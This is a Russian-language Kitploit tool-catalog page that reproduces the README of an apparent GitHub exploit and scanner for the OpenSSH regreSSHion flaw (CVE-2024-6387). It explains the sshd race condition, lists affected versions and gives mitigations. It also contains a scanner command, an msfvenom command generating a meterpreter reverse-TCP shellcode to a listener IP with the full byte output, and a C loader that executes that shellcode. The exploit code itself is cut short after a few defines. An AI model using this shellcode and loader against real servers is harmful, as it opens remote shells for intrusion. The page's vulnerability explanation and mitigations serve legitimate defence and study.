Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-6387 — Эксплойт и сканер для CVE-2024-6387 (regreSSHion) в OpenSSH. Включает обнаружение, эксплуатацию RCE и генерацию шеллкода для авторизованного тестирования на проникновение и лабораторных сред. | Kitploit
Инструменты/GitHubGitHub/kaleth4/cve-2024-6387
Анализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubkaleth4/cve-2024-6387

CVE-2024-6387

Эксплойт и сканер для CVE-2024-6387 (regreSSHion) в OpenSSH. Включает обнаружение, эксплуатацию RCE и генерацию шеллкода для авторизованного тестирования на проникновение и лабораторных сред.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
root@kitploit:~
      ЭКСПЛУАТАЦИЯ CVE-2024-6387

💥 ЭКСПЛУАТАЦИЯ CVE-2024-6387 (regreSSHion)

Инструмент для анализа, обнаружения и контролируемого тестирования уязвимости CVE-2024-6387 в серверах OpenSSH.


Bash Python Ethical


⚠️ Правовое и этическое предупреждение

Этот репозиторий предназначен исключительно для образовательных целей.
Используйте его только в:

  • Лабораториях (HTB, TryHackMe)
  • Собственных средах
  • Аудиториях с явным разрешением

⚠️ Сканирование или эксплуатация систем без разрешения незаконны.
Этот контент предназначен для защиты и обучения.


📑 Содержание

  • 📖 Общее описание
  • 🔍 Технические детали
  • 📊 Затронутые версии
  • ⚙️ Использование
  • 🛠️ Смягчение
  • 📚 Ссылки
  • 👤 Автор
  • 📢 Отказ от ответственности

📖 Общее описание

CVE-2024-6387, известная как regreSSHion, является регрессией уязвимости, ранее исправленной в 2006 году (CVE-2006-5051).

Была повторно внесена в OpenSSH 8.5p1 (2020) и позволяет:

  • Удаленное выполнение кода (RCE)
  • Потенциальный доступ с правами root
  • Неаутентифицированная атака
  • Без взаимодействия с пользователем

Также существует связанная уязвимость:

  • CVE-2024-6409 → затрагивает дочерний процесс в средах с разделением привилегий

🔍 Технические детали

Уязвимость основана на состоянии гонки в обработчике сигналов sshd.

🧠 Принцип работы

  1. Сервер определяет LoginGraceTime (по умолчанию: 120 с)
  2. Если клиент не аутентифицируется:
    • Срабатывает сигнал SIGALRM
  3. Обработчик выполняет небезопасные для сигналов функции, такие как:
    • syslog()
    • malloc()
    • free()

💣 Воздействие

Это может привести к:

  • Повреждению памяти (кучи)
  • Произвольному выполнению кода

⏱️ Сложность эксплуатации

  • Требуется ~10 000 попыток (состояние гонки)
  • В 32-битных системах:
    • Может занять 6–8 часов
  • Факторы:
    • ASLR
    • Задержка сети
    • Нагрузка на систему

📊 Затронутые версии

СтатусВерсииПримечания
⚠️ Уязвим< 4.4p1Если нет старого патча
✅ Безопасен4.4p1 → < 8.5p1Ранее исправлено
⚠️ Уязвим8.5p1 → < 9.8p1Регрессия присутствует
✅ Исправлено>= 9.8p1Официальный патч

🛡️ OpenBSD не уязвима благодаря дополнительным мерам защиты, реализованным с 2001 года. 2 1


##⚙️ Использование python3 exploit.py

🔎 Сканирование серверов OpenSSH

root@kitploit:~
python3 scanner.py <IP> -p 22

```bash

# Generating a shellcode 
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes

unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

Пользовательская нагрузка

root@kitploit:~
#include <stdio.h>

// A placeholder of your custom payload 
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

int main() {
    // Execute shellcode
    printf("Executing shellcode...\n");
    void (*sc)() = (void(*)())shellcode;
    sc();

    return 0;
}

Актуальная нагрузка

root@kitploit:~
#include <stdio.h>
 

#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)


🛠️ Смягчение и исправление Рекомендуется срочно выполнить следующие шаги, особенно для активов, доступных из Интернета:

  • Немедленное обновление: Обновить до OpenSSH 9.8p1 или применить патчи для конкретного дистрибутива.

  • Настройка sshd: Если обновление невозможно, установите LoginGraceTime 0 в файле /etc/ssh/sshd_config.

Предупреждение: Это предотвращает RCE, но подвергает сервер отказу в обслуживании (DoS) из-за истощения соединений.

  • Контроль доступа: Ограничьте SSH-доступ с помощью сетевых средств контроля (межсетевые экраны/VPN) и сегментации сети для предотвращения бокового перемещения.

Ссылки

  • https://www.zscaler.com/blogs/security-research/openssh-vulnerabilities-cve-2024-6387-cve-2024-6409-pose-significant
  • https://www.exploit-db.com/exploits/52269
  • https://www.offsec.com/blog/regresshion-exploit-cve-2024-6387/
  • https://github.com/xaitax/CVE-2024-6387_Check

👤 Автор

Kaleth Corcho
Системная инженерия · WolvesTI · Богота, Колумбия

LinkedIn GitHub


📢 Отказ от ответственности

  • Важное примечание:
    • Этот инструмент разработан и используется исключительно для авторизованного тестирования на проникновение и упражнений красных команд. Он предназначен для выявления и эксплуатации уязвимостей в сервере OpenSSH на Linux-системах на базе glibc. Несанкционированное использование этого инструмента строго запрещено. Владелец этого инструмента не несет ответственности за любой несанкционированный доступ или злонамеренное использование инструмента.
  • Правовое уведомление:
    • Несанкционированное использование этого инструмента в системах или сетях без явного разрешения соответствующих владельцев может нарушать применимые законы и нормативные акты. Пользователи несут ответственность за соблюдение правовых и этических стандартов, регулирующих тестирование и оценку кибербезопасности.
Скачать инструмент